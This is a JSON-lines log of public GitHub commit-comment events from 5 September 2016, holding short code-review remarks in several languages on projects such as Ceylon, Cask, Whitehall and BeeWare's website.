{"id":"4515828839","type":"CommitCommentEvent","actor":{"login":"mrshu"},"repo":{"name":"xlcteam/quotator"},"payload":{"comment":{"id":18897660,"position":71,"line":88,"path":"quotes/views.py","commit_id":"89fcbf9f3cb61d23f962a22c0b0a3ff0f01b4763","created_at":"2016-09-05T09:02:24Z","updated_at":"2016-09-05T09:02:24Z","body":"@Adman Ausgezeichnet!"}},"created_at":"2016-09-05T09:02:24Z"}
{"id":"4515831765","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18897665,"position":5,"line":82,"path":"compiler-java/src/com/redhat/ceylon/compiler/java/tools/CeyloncTool.java","commit_id":"db807b2a703da06cbbf9b71943aff1d44a893724","created_at":"2016-09-05T09:03:05Z","updated_at":"2016-09-05T09:03:05Z","body":"Looks like an accident to me."}},"created_at":"2016-09-05T09:03:05Z"}
{"id":"4515833989","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18897671,"position":32,"line":2368,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/analyzer/DeclarationVisitor.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-05T09:03:35Z","updated_at":"2016-09-05T09:03:35Z","body":"Well, that code should be given a name, since it's allocated."}},"created_at":"2016-09-05T09:03:35Z"}
{"id":"4515834846","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18897673,"position":37,"line":2372,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/analyzer/DeclarationVisitor.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-05T09:03:47Z","updated_at":"2016-09-05T09:03:47Z","body":"Same here."}},"created_at":"2016-09-05T09:03:47Z"}
{"id":"4515835053","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897674,"position":4,"line":53,"path":"app/views/customers/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:03:49Z","updated_at":"2016-09-05T09:03:49Z","body":"les id ne sont pas corrects, ils devraient être pour le customer"}},"created_at":"2016-09-05T09:03:49Z"}
{"id":"4515835125","type":"CommitCommentEvent","actor":{"login":"apeteri"},"repo":{"name":"IHTSDO/snomed-drools"},"payload":{"comment":{"id":18897676,"position":null,"line":null,"path":null,"commit_id":"88981063fc802cdb10be053b5dbb65cfb185022e","created_at":"2016-09-05T09:03:50Z","updated_at":"2016-09-05T09:03:50Z","body":"To create a symbolic link to the rules directory on Windows, run `mklink /d D:\\ihtsdo\\snomed-drools\\rules D:\\ihtsdo\\snomed-drools-rules` from a command prompt with Administrator privileges. Eclipse seems to be picking it up correctly:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/1411829/18242779/4ad67b8c-7358-11e6-9245-4ce91fa323e9.png)"}},"created_at":"2016-09-05T09:03:50Z"}
{"id":"4515835651","type":"CommitCommentEvent","actor":{"login":"cheshire"},"repo":{"name":"sosy-lab/cpachecker"},"payload":{"comment":{"id":18897678,"position":null,"line":null,"path":null,"commit_id":"4a8f1337f4329e661f5fab4d4983548c3e5f0915","created_at":"2016-09-05T09:03:57Z","updated_at":"2016-09-05T09:03:57Z","body":"Ooops, sorry =("}},"created_at":"2016-09-05T09:03:57Z"}
{"id":"4515836066","type":"CommitCommentEvent","actor":{"login":"Pro"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":18897680,"position":null,"line":null,"path":null,"commit_id":"dfad8fa02f27a45b6d1ef1db8836d74b75cfdaa7","created_at":"2016-09-05T09:04:01Z","updated_at":"2016-09-05T09:04:01Z","body":"@ichrispa is there a specific reason why you re-added the `UA_ENCODINGOFFSET_BINARY`?\r\n\r\nImho this shouldn't be used to avoid issues described in #769"}},"created_at":"2016-09-05T09:04:01Z"}
{"id":"4515836627","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897681,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T09:04:08Z","updated_at":"2016-09-05T09:04:08Z","body":"That must be vscode's doing, there's just no way this is different between these modes."}},"created_at":"2016-09-05T09:04:08Z"}
{"id":"4515837092","type":"CommitCommentEvent","actor":{"login":"rugaard"},"repo":{"name":"vapor/leaf"},"payload":{"comment":{"id":18897684,"position":5,"line":149,"path":"README.md","commit_id":"267da1f4c89a41a3971805a644f0333f30bce221","created_at":"2016-09-05T09:04:14Z","updated_at":"2016-09-05T09:04:14Z","body":"The URL is is `/blade` instead of `/templates` :)\r\n\r\n[https://laravel.com/docs/5.3/blade](https://laravel.com/docs/5.3/blade)"}},"created_at":"2016-09-05T09:04:14Z"}
{"id":"4515838147","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897685,"position":10,"line":59,"path":"app/views/customers/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:04:29Z","updated_at":"2016-09-05T09:04:29Z","body":"utilise plutôt consumption_placeholder comme pour les autres (à fixer à plusieurs endroits dans ce diff)"}},"created_at":"2016-09-05T09:04:29Z"}
{"id":"4515841495","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18897694,"position":8,"line":5,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/tree/ErrorCode.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-05T09:05:16Z","updated_at":"2016-09-05T09:05:16Z","body":"I strongly suspected these codes were dodgy, that's why I asked Gavin to check them. I'm not surprised they're gone. OTOH the ones you kept should be added here and given a name so the next time we have a change of reusing them."}},"created_at":"2016-09-05T09:05:16Z"}
{"id":"4515842708","type":"CommitCommentEvent","actor":{"login":"garbas"},"repo":{"name":"NixOS/nixos-weekly"},"payload":{"comment":{"id":18897698,"position":null,"line":null,"path":null,"commit_id":"f565d0e82e09f7376b13fce9954b4903cb794e62","created_at":"2016-09-05T09:05:31Z","updated_at":"2016-09-05T09:05:31Z","body":"@fpletz not intended, just whatever one of those online favicon generators spit out."}},"created_at":"2016-09-05T09:05:31Z"}
{"id":"4515843184","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18897700,"position":null,"line":null,"path":null,"commit_id":"406d1f6b90114466f7ae911e7404418b2976e50c","created_at":"2016-09-05T09:05:39Z","updated_at":"2016-09-05T09:05:39Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/34892/testReport/) for this commit**"}},"created_at":"2016-09-05T09:05:39Z"}
{"id":"4515844670","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897706,"position":5,"line":28,"path":"app/views/vehicle_usages/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:06:00Z","updated_at":"2016-09-05T09:06:00Z","body":"non, il faut que le vehicule ait des méthodes default_emission et no plus utiliser nulle part emission plutôt (comme pour les visits et vehicle_usages"}},"created_at":"2016-09-05T09:06:00Z"}
{"id":"4515844985","type":"CommitCommentEvent","actor":{"login":"liiiku"},"repo":{"name":"liiiku/jsAnimation"},"payload":{"comment":{"id":18897707,"position":null,"line":null,"path":null,"commit_id":"4a16c82d8f15ed6783c1a9ebee8df47ad4f0389f","created_at":"2016-09-05T09:06:04Z","updated_at":"2016-09-05T09:06:04Z","body":"js根据传参的不同，实现不同的动画效果，基本能实现：单一的宽高的变化；透明度的变化；宽、高、透明度的链式运动；宽、高、透明度同时运动，各个拆分组合的简单运动。另外，由于是多物体运动，所以需要为每个运动单独设定定时器，以及同时运动的时候，对不同参数完成程度的flag标志的设置位置"}},"created_at":"2016-09-05T09:06:04Z"}
{"id":"4515845303","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897708,"position":8,"line":30,"path":"app/views/vehicle_usages/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:06:09Z","updated_at":"2016-09-05T09:06:09Z","body":"idem"}},"created_at":"2016-09-05T09:06:09Z"}
{"id":"4515845732","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897709,"position":18,"line":44,"path":"app/views/vehicle_usages/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:06:14Z","updated_at":"2016-09-05T09:06:14Z","body":"re"}},"created_at":"2016-09-05T09:06:14Z"}
{"id":"4515846007","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18897712,"position":19,"line":45,"path":"app/views/vehicle_usages/_form.html.erb","commit_id":"2f0b5611d357c54d8cb9e89e08c9b0d76ae9da35","created_at":"2016-09-05T09:06:17Z","updated_at":"2016-09-05T09:06:17Z","body":"re"}},"created_at":"2016-09-05T09:06:17Z"}
{"id":"4515847541","type":"CommitCommentEvent","actor":{"login":"kaicode"},"repo":{"name":"IHTSDO/snomed-drools"},"payload":{"comment":{"id":18897717,"position":null,"line":null,"path":null,"commit_id":"88981063fc802cdb10be053b5dbb65cfb185022e","created_at":"2016-09-05T09:06:37Z","updated_at":"2016-09-05T09:06:37Z","body":"Thanks András.\r\n@granvold "}},"created_at":"2016-09-05T09:06:37Z"}
{"id":"4515848416","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":18897722,"position":5,"line":29,"path":"subjects/PE-x86/pySample/pySample.c","commit_id":"65720b5f43dbbe1bf9f15c57e5cb487119af44c9","created_at":"2016-09-05T09:06:48Z","updated_at":"2016-09-05T09:06:48Z","body":"Nice output! Thanks, John"}},"created_at":"2016-09-05T09:06:48Z"}
{"id":"4515850568","type":"CommitCommentEvent","actor":{"login":"Krishna1235"},"repo":{"name":"Krishna1235/Test-Example-2"},"payload":{"comment":{"id":18897726,"position":null,"line":null,"path":null,"commit_id":"5a475547b6d25abb85b644233bf72df23c92a696","created_at":"2016-09-05T09:07:16Z","updated_at":"2016-09-05T09:07:16Z","body":"i commented as some one else"}},"created_at":"2016-09-05T09:07:16Z"}
{"id":"4515855141","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18897735,"position":6,"line":6,"path":"app/controllers/routes_controller.rb","commit_id":"552d258595ff1d4e9f0510ed4211dbf2922fdce5","created_at":"2016-09-05T09:08:17Z","updated_at":"2016-09-05T09:08:17Z","body":"Ставь пустые строки между методами"}},"created_at":"2016-09-05T09:08:17Z"}
{"id":"4515857598","type":"CommitCommentEvent","actor":{"login":"TomCab"},"repo":{"name":"aedonis/octopus"},"payload":{"comment":{"id":18897739,"position":null,"line":null,"path":null,"commit_id":"7c410be0bf70feda9a16d6db71219fceb0ab1e64","created_at":"2016-09-05T09:08:52Z","updated_at":"2016-09-05T09:08:52Z","body":"I've no idea either. Sorry."}},"created_at":"2016-09-05T09:08:52Z"}
{"id":"4515863464","type":"CommitCommentEvent","actor":{"login":"Krishna1235"},"repo":{"name":"Krishna1235/Test-Example-2"},"payload":{"comment":{"id":18897752,"position":null,"line":null,"path":null,"commit_id":"5a475547b6d25abb85b644233bf72df23c92a696","created_at":"2016-09-05T09:10:11Z","updated_at":"2016-09-05T09:10:11Z","body":"this was my new comment"}},"created_at":"2016-09-05T09:10:11Z"}
{"id":"4515877137","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897772,"position":13,"line":13,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:13:12Z","updated_at":"2016-09-05T09:13:12Z","body":"s/isn't/aren't/ -  there's a plural thing going on here."}},"created_at":"2016-09-05T09:13:12Z"}
{"id":"4515877408","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"Turing1887/ProjektA"},"payload":{"comment":{"id":18897773,"position":null,"line":null,"path":null,"commit_id":"dcd2d60a506df140a826b421963f5325fe8740b0","created_at":"2016-09-05T09:13:16Z","updated_at":"2016-09-05T09:13:16Z","body":"# Anmerkung\r\n## Versehentlicher Commit"}},"created_at":"2016-09-05T09:13:16Z"}
{"id":"4515880803","type":"CommitCommentEvent","actor":{"login":"casbboy"},"repo":{"name":"casbboy/facebook_comments_sync"},"payload":{"comment":{"id":18897778,"position":null,"line":null,"path":null,"commit_id":"00c7e5609f65671234f426cee5bbeae778898fe0","created_at":"2016-09-05T09:14:02Z","updated_at":"2016-09-05T09:14:02Z","body":"Actually, this is working when a new comment is submitted through the Facebook Comment box on your WordPress site. But, the Admin Sync function is not working.\r\n\r\nfunction fbcsf_impComments($post_ID)\r\n\r\nCould be the issue."}},"created_at":"2016-09-05T09:14:02Z"}
{"id":"4515881256","type":"CommitCommentEvent","actor":{"login":"nasparro"},"repo":{"name":"nasparro/hello-world"},"payload":{"comment":{"id":18897779,"position":2,"line":2,"path":"README.md","commit_id":"9d20b92ba6c6a2f7395a2d2bbc29b5f3f23093e7","created_at":"2016-09-05T09:14:09Z","updated_at":"2016-09-05T09:14:09Z","body":"This is my first non-coding program\r\ntry it now."}},"created_at":"2016-09-05T09:14:09Z"}
{"id":"4515885846","type":"CommitCommentEvent","actor":{"login":"aedonis"},"repo":{"name":"aedonis/octopus"},"payload":{"comment":{"id":18897782,"position":null,"line":null,"path":null,"commit_id":"7c410be0bf70feda9a16d6db71219fceb0ab1e64","created_at":"2016-09-05T09:15:12Z","updated_at":"2016-09-05T09:15:12Z","body":"No worries, something got probably mixed up.\r\n\r\nCheers.\r\nA"}},"created_at":"2016-09-05T09:15:12Z"}
{"id":"4515891659","type":"CommitCommentEvent","actor":{"login":"mkletsko"},"repo":{"name":"mkletsko/demo-application-title"},"payload":{"comment":{"id":18897799,"position":null,"line":null,"path":null,"commit_id":"16460686fd3cc1d0fa4d492609831bb56058d676","created_at":"2016-09-05T09:16:30Z","updated_at":"2016-09-05T09:16:30Z","body":"create url file json"}},"created_at":"2016-09-05T09:16:30Z"}
{"id":"4515894359","type":"CommitCommentEvent","actor":{"login":"KochIK"},"repo":{"name":"KochIK/KVTimer"},"payload":{"comment":{"id":18897803,"position":null,"line":null,"path":null,"commit_id":"04ecbcfa7ba8ded3f2f413bdae47239fcd39187a","created_at":"2016-09-05T09:17:07Z","updated_at":"2016-09-05T09:17:07Z","body":"First"}},"created_at":"2016-09-05T09:17:07Z"}
{"id":"4515898328","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18897807,"position":null,"line":null,"path":null,"commit_id":"6a48ee5b72319a9c6314c274b7f3fed1fdf339b5","created_at":"2016-09-05T09:18:00Z","updated_at":"2016-09-05T09:18:00Z","body":"#260"}},"created_at":"2016-09-05T09:18:00Z"}
{"id":"4515898563","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18897808,"position":null,"line":null,"path":null,"commit_id":"42fcc970fca8e5c540277ba30dfe5fc521febe2f","created_at":"2016-09-05T09:18:04Z","updated_at":"2016-09-05T09:18:04Z","body":"#260"}},"created_at":"2016-09-05T09:18:04Z"}
{"id":"4515898881","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18897809,"position":null,"line":null,"path":null,"commit_id":"e9270e342aee314bc4a301005a3b41afe4e52b4b","created_at":"2016-09-05T09:18:09Z","updated_at":"2016-09-05T09:18:09Z","body":"#260"}},"created_at":"2016-09-05T09:18:09Z"}
{"id":"4515899139","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18897810,"position":null,"line":null,"path":null,"commit_id":"89651f8cbe900ae895cb9501740a5fc4b1e529f3","created_at":"2016-09-05T09:18:12Z","updated_at":"2016-09-05T09:18:12Z","body":"#260"}},"created_at":"2016-09-05T09:18:12Z"}
{"id":"4515899360","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18897811,"position":null,"line":null,"path":null,"commit_id":"21d27923ddd52713f468e543699c487b49e1409b","created_at":"2016-09-05T09:18:15Z","updated_at":"2016-09-05T09:18:15Z","body":"#260"}},"created_at":"2016-09-05T09:18:15Z"}
{"id":"4515901643","type":"CommitCommentEvent","actor":{"login":"christianyudhistira"},"repo":{"name":"christianyudhistira/TrainingAtmel"},"payload":{"comment":{"id":18897814,"position":null,"line":null,"path":null,"commit_id":"ae2dc3c1533485642f49c51870efdb2170e5730b","created_at":"2016-09-05T09:18:47Z","updated_at":"2016-09-05T09:18:47Z","body":"testes"}},"created_at":"2016-09-05T09:18:47Z"}
{"id":"4515915636","type":"CommitCommentEvent","actor":{"login":"MaMsCodeB"},"repo":{"name":"MaMsCodeB/001_Test"},"payload":{"comment":{"id":18897839,"position":5,"line":15,"path":"001_Test/Program.cs","commit_id":"d7adca3aa73b02a08f164faf34e9643582573e91","created_at":"2016-09-05T09:21:59Z","updated_at":"2016-09-05T09:21:59Z","body":"Dieser **Kommentar** ist geprüft. Kann man so stehen lassen"}},"created_at":"2016-09-05T09:21:59Z"}
{"id":"4515916963","type":"CommitCommentEvent","actor":{"login":"chuckrector"},"repo":{"name":"chuckrector/mappo"},"payload":{"comment":{"id":18897842,"position":null,"line":null,"path":null,"commit_id":"6f959612d3385fe7c58f913f3653d8104af93d26","created_at":"2016-09-05T09:22:18Z","updated_at":"2016-09-05T09:22:18Z","body":"Woops. This is the `v2chr2png` cli, not the `v2vsp2png` cli."}},"created_at":"2016-09-05T09:22:18Z"}
{"id":"4515917188","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"BitFunnel/NativeJIT"},"payload":{"comment":{"id":18897845,"position":88,"line":109,"path":"Documentation/README.md","commit_id":"faf2a7f30098f4c36356291023e172caaf1d5645","created_at":"2016-09-05T09:22:21Z","updated_at":"2016-09-05T09:22:21Z","body":"`auto & a = expression.Mul(expression.GetP1(), expression.GetP1());` is pretty much nonsense with this binop. Multiply the first arg with itself leads to p1*p1.\r\n\r\nrather write it as:\r\n\r\n    auto & a = expression.GetP1();\r\n    auto & b = expression.Mul(a, expression.Immediate(PI));\r\n\r\nor even:\r\n\r\n    auto & a = expression.Mul(expression.GetP1(), expression.Immediate(PI));\r\n    auto function = expression.Compile(a);"}},"created_at":"2016-09-05T09:22:21Z"}
{"id":"4515922352","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/whitehall"},"payload":{"comment":{"id":18897856,"position":null,"line":null,"path":null,"commit_id":"710b2e5f5d7d069e708aa00bd3a6cd63288cdf97","created_at":"2016-09-05T09:23:33Z","updated_at":"2016-09-05T09:23:33Z","body":"This will only delete the Edition. We need to remove the Document too, and related Editions."}},"created_at":"2016-09-05T09:23:33Z"}
{"id":"4515927546","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":18897868,"position":null,"line":null,"path":null,"commit_id":"a3f0ec60abe69f1ce876a37b6c840b310158cf0e","created_at":"2016-09-05T09:24:42Z","updated_at":"2016-09-05T09:24:42Z","body":"Es copiado y pegado desde el anterior... La verdad es que tuvimos un buen\nfollón con eso, pero no lo sé. ¿Latin1?\n"}},"created_at":"2016-09-05T09:24:42Z"}
{"id":"4515933264","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18897877,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T09:25:58Z","updated_at":"2016-09-05T09:25:58Z","body":"@fommil I'm sorry that we broke your tests but please understand that we can't notify each and every user about breaking changes that we make.  If you track the `master` branch of Cask you've got to expect breakage and follow development yourself.\r\n\r\nYou're expecting to much—please don't offload your work to us.  With all due respect it's not our job to fix your tests. "}},"created_at":"2016-09-05T09:25:58Z"}
{"id":"4515935913","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18897884,"position":4,"line":4,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-05T09:26:33Z","updated_at":"2016-09-05T09:26:33Z","body":"update age :)"}},"created_at":"2016-09-05T09:26:33Z"}
{"id":"4515936752","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18897885,"position":9,"line":9,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-05T09:26:46Z","updated_at":"2016-09-05T09:26:46Z","body":"update cel phone :)"}},"created_at":"2016-09-05T09:26:46Z"}
{"id":"4515940771","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18897894,"position":11,"line":11,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-05T09:27:38Z","updated_at":"2016-09-05T09:27:38Z","body":"add link to this repository 👍 "}},"created_at":"2016-09-05T09:27:38Z"}
{"id":"4515943786","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18897898,"position":27,"line":27,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-05T09:28:18Z","updated_at":"2016-09-05T09:28:18Z","body":"add current job 💯 "}},"created_at":"2016-09-05T09:28:18Z"}
{"id":"4515945908","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897901,"position":21,"line":21,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:28:48Z","updated_at":"2016-09-05T09:28:48Z","body":"I'm wondering if some other term might be better here. \"core\" The obvious candidate is \"senior\", but I'm not wild about that term, either. "}},"created_at":"2016-09-05T09:28:48Z"}
{"id":"4515947285","type":"CommitCommentEvent","actor":{"login":"falqn"},"repo":{"name":"makinacorpus/Leaflet.FileLayer"},"payload":{"comment":{"id":18897906,"position":null,"line":null,"path":null,"commit_id":"ea86a732bf5f94a96ff099614169b5adf2454229","created_at":"2016-09-05T09:29:07Z","updated_at":"2016-09-05T09:29:07Z","body":"Link http://makinacorpus.github.io/src/leaflet.filelayer.js\r\nis not working. To resolve the problem on my page I've cloned all files to local disk. But it's still not working, something changes from 01.09.2016 - in this day everything was ok. I do not know what to do now...\r\nI have error \"Uncaught TypeError: Cannot set property 'LABEL' of undefined\"."}},"created_at":"2016-09-05T09:29:07Z"}
{"id":"4515950942","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897917,"position":25,"line":25,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:29:55Z","updated_at":"2016-09-05T09:29:55Z","body":"And here's where there's a cross over with the term \"core\". The collective noun for \"everyone in the team\" shouldn't overlap with \"members of the team with special powers.\""}},"created_at":"2016-09-05T09:29:55Z"}
{"id":"4515953175","type":"CommitCommentEvent","actor":{"login":"tomlinNTUB"},"repo":{"name":"tomlinNTUB/hello-world"},"payload":{"comment":{"id":18897923,"position":null,"line":null,"path":null,"commit_id":"f30877e86dd46e917a8bbff6a71bdcfdb8726ba6","created_at":"2016-09-05T09:30:27Z","updated_at":"2016-09-05T09:30:27Z","body":"Hello"}},"created_at":"2016-09-05T09:30:27Z"}
{"id":"4515959951","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897936,"position":26,"line":26,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:31:56Z","updated_at":"2016-09-05T09:31:56Z","body":"Another datum here: One of the things that Django has done is acknowledge that there are members in the wider community who don't contribute to *Django*, but who are essential to it's operation. Tom Christie with DRF and the Ola's are classic examples. Being able to say they're part of the core team gives them a certain authority to speak on behalf of the project, even though they're not active code contributors to the core itself. \r\n\r\nI have mixed feelings about whether this is a good idea (or has been successful in the Django context); I'd be interested in hearing other thoughts."}},"created_at":"2016-09-05T09:31:56Z"}
{"id":"4515961505","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18897937,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-05T09:32:17Z","updated_at":"2016-09-05T09:32:17Z","body":"Yeah but what is giving these GuardianAI? Because if it's the AISelector, that thing only gives pets GuardianAI and that should be right. How exactly are these added to the world and made pets if not by summoned via script/spell effect?"}},"created_at":"2016-09-05T09:32:17Z"}
{"id":"4515962787","type":"CommitCommentEvent","actor":{"login":"Alexandre-cibot"},"repo":{"name":"Alexandre-cibot/Nasa-Project"},"payload":{"comment":{"id":18897940,"position":null,"line":null,"path":null,"commit_id":"2f44cb74624997fe9c5018338848dfba722818d2","created_at":"2016-09-05T09:32:34Z","updated_at":"2016-09-05T09:32:34Z","body":"also, there is now impossible to request an futur date "}},"created_at":"2016-09-05T09:32:34Z"}
{"id":"4515964982","type":"CommitCommentEvent","actor":{"login":"fommil"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18897941,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T09:33:04Z","updated_at":"2016-09-05T09:33:04Z","body":"I'm not offloading work to anybody, I said exactly \"Happy to accept a PR to rewrite!\" and I would be. In other words: \"yes, I know I should be using cask to run my tests, but we don't have time to do that refactor and I bet you don't either, so let's just leave it there.\""}},"created_at":"2016-09-05T09:33:04Z"}
{"id":"4515965103","type":"CommitCommentEvent","actor":{"login":"SunApriloy"},"repo":{"name":"SunApriloy/imooc"},"payload":{"comment":{"id":18897942,"position":null,"line":null,"path":null,"commit_id":"a9d091cc53bcabd13e3aafe905fb320f245e2486","created_at":"2016-09-05T09:33:07Z","updated_at":"2016-09-05T09:33:07Z","body":"幕课网进击nodejs基础 http小爬虫程序"}},"created_at":"2016-09-05T09:33:07Z"}
{"id":"4515970279","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18897952,"position":5,"line":6,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"93e987762013b4b29f86112b3a5ac85221853c96","created_at":"2016-09-05T09:34:16Z","updated_at":"2016-09-05T09:34:16Z","body":"nope..."}},"created_at":"2016-09-05T09:34:16Z"}
{"id":"4515970527","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897954,"position":36,"line":36,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:34:19Z","updated_at":"2016-09-05T09:34:19Z","body":" - Assume everyone has good intentions, even if *they* haven't chosen their words well.\r\n - Assume that if someone has done something the \"wrong\" way, it's because *we've* failed in communicating process.\r\n - Assume any expression of anger or frustration comes from a genuine place of *wanting* to use a BeeWare tool/library."}},"created_at":"2016-09-05T09:34:19Z"}
{"id":"4515971912","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18897960,"position":null,"line":null,"path":null,"commit_id":"495d6d04e07665dca15ae3aa2561c1048ed6fd62","created_at":"2016-09-05T09:34:38Z","updated_at":"2016-09-05T09:34:38Z","body":"@Sami32 there were other corrections I posted too, on all lines :)"}},"created_at":"2016-09-05T09:34:38Z"}
{"id":"4515971940","type":"CommitCommentEvent","actor":{"login":"mgrassotti"},"repo":{"name":"alphagov/whitehall"},"payload":{"comment":{"id":18897961,"position":null,"line":null,"path":null,"commit_id":"710b2e5f5d7d069e708aa00bd3a6cd63288cdf97","created_at":"2016-09-05T09:34:38Z","updated_at":"2016-09-05T09:34:38Z","body":"Ok, that should be in the latest commit.\n\nOn 5 September 2016 at 11:23, Paul Bowsher <notifications@github.com> wrote:\n\n> This will only delete the Edition. We need to remove the Document too, and\n> related Editions.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/alphagov/whitehall/commit/710b2e5f5d7d069e708aa00bd3a6cd63288cdf97#commitcomment-18897856>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGlrBQ4R5tuLbRfXbis0tOzWTV9Yk6lSks5qm9-YgaJpZM4J05Fo>\n> .\n>\n"}},"created_at":"2016-09-05T09:34:38Z"}
